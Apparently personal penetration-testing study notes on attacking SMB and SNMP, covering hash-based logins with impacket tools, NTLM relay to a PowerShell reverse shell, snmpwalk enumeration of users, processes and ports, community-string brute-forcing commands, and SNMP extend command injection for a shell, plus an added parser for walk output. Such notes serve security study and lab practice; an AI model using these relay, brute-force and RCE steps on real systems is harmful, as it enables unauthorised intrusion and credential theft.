SMB,SMTP,SNMP enum
SMB attack
tools to manage SMB and enumerate it:
enum4linux
CrackMapExec
smbclient
login by hash
-U: set the user
--pw-nt-hash: use the password hash
login by password
tools for command execution:
impacket-wmiexec
impacket-psexec
use hash
-hashes: use "LMHash:NTHash"; if there is no LM hash, use 32 zeros in its place
second parameter: "username@ip"
use password to get a shell
impacket-ntlmrelayx
SMB relay with the password hash (which you can't crack); no UAC
this module can relay the authentication to the target and run a command there using the password hash, if both hosts have the same hash
powershell reverse shell one-liner
encode the one-liner with the UTF-16LE charset (https://www.base64encode.org/)
reverse shell using only powershell
--no-http-server: disable the http server because we use SMB relay
-t: set the target
-smb2support: add support for SMB2
-c: set the command
on the FILE01 machine, check the directory of the SMB share:
```shell
dir \\192.168.45.210\test
```
net view(Windows)
nbtscan
SMTP
skip!!!
enum
snmp hacktricks
SNMP MIB tree
| id | name |
|---|---|
| 1.3.6.1.2.1.25.1.6.0 | System Processes |
| 1.3.6.1.2.1.25.4.2.1.2 | Running Programs |
| 1.3.6.1.2.1.25.4.2.1.4 | Processes Path |
| 1.3.6.1.2.1.25.2.3.1.4 | Storage Units |
| 1.3.6.1.2.1.25.6.3.1.2 | Software Name |
| 1.3.6.1.4.1.77.1.2.25 | User Accounts |
| 1.3.6.1.2.1.6.13.1.3 | TCP Local Ports |
public: the common default community string
scan a range:
tools:
snmpwalk:
enumerate the whole tree
-c: set the community string
-Oa: automatically translate any hexadecimal string into ASCII that was otherwise not decoded
-v1: specify the SNMP version number
-t: set the timeout period
enum the users (OID 1.3.6.1.4.1.77.1.2.25 in the table):
```shell
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.4.1.77.1.2.25
```
enum the processes:
```shell
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.25.4.2.1.2
```
enum the software installed:
```shell
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.25.6.3.1.2
```
enum the listening tcp ports:
```shell
snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.6.13.1.3
```
enum the extend output:
```shell
snmpwalk -v 2c -c public 192.168.240.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
```
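To review what a read-only community string actually exposes, here is an added parser (not part of the original notes) that maps each OID returned by walks like the ones above back to the category in the MIB table and decodes Hex-STRING values the way -Oa would; the sample walk output is constructed, not captured from a real host.

```python
import re

# OID prefixes from the MIB table above; the longest matching prefix wins.
OID_CATEGORIES = {
    "1.3.6.1.2.1.25.1.6.0": "System Processes",
    "1.3.6.1.2.1.25.4.2.1.2": "Running Programs",
    "1.3.6.1.2.1.25.4.2.1.4": "Processes Path",
    "1.3.6.1.2.1.25.2.3.1.4": "Storage Units",
    "1.3.6.1.2.1.25.6.3.1.2": "Software Name",
    "1.3.6.1.4.1.77.1.2.25": "User Accounts",
    "1.3.6.1.2.1.6.13.1.3": "TCP Local Ports",
}

# snmpwalk prints "<oid> = <TYPE>: <value>"; TYPE is missing for empty values.
LINE_RE = re.compile(r"^(?P<oid>\S+)\s*=\s*(?:(?P<type>[A-Za-z0-9-]+):\s*)?(?P<val>.*)$")

def normalize_oid(raw):
    # Turn "iso.3.6..." or ".1.3.6..." into the dotted numeric form "1.3.6...".
    raw = raw.strip().lstrip(".")
    return "1." + raw[4:] if raw.startswith("iso.") else raw

def decode_value(vtype, val):
    # Hex-STRING is what -Oa would have rendered as ASCII; STRING values are quoted.
    if vtype == "Hex-STRING":
        data = bytes(int(h, 16) for h in val.split())
        return data.rstrip(b"\x00").decode("ascii", errors="replace")
    return val.strip().strip('"') if vtype in ("STRING", None) else val.strip()

def categorize(oid):
    # Map an OID to its MIB-table category, or "Uncategorized" if no prefix matches.
    matches = [p for p in OID_CATEGORIES if oid == p or oid.startswith(p + ".")]
    return OID_CATEGORIES[max(matches, key=len)] if matches else "Uncategorized"

def summarize(walk_output):
    # Group decoded values by category so the exposure is easy to review.
    summary = {}
    for line in walk_output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m: continue
        oid = normalize_oid(m.group("oid"))
        summary.setdefault(categorize(oid), []).append(decode_value(m.group("type"), m.group("val")))
    return summary

# Constructed sample output (hypothetical values, not a capture from a real host).
SAMPLE_WALK = """iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: Intel64 Family 6"
iso.3.6.1.4.1.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
iso.3.6.1.4.1.77.1.2.25.1.1.13.65.100.109.105.110 = STRING: "Administrator"
iso.3.6.1.2.1.25.4.2.1.2.1664 = STRING: "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.2.2048 = Hex-STRING: 73 71 6C 73 65 72 76 72 2E 65 78 65 00
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.0 = INTEGER: 445"""
```

Feed it the saved stdout of a full-tree walk and `summarize()` returns a dict keyed by the table's categories, which is a quick way to see which accounts, processes and ports a community string leaks.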
brute
```shell
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute 192.168.214.149 --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.214.149
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.214.149 snmp
```
RCE in snmp
SNMP RCE hacktricks
if you can enumerate run-on-read(), it could lead to RCE
test:
inject the command
execute it
inject the reverse shell (https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)
listen on the port and execute it
or use the exploit https://github.com/mxrch/snmp-shell
usage:
if you need to execute a long command, like pushing your SSH public key, you need to run legacy.py
use an ed25519 SSH public key, not an RSA one; it's shorter.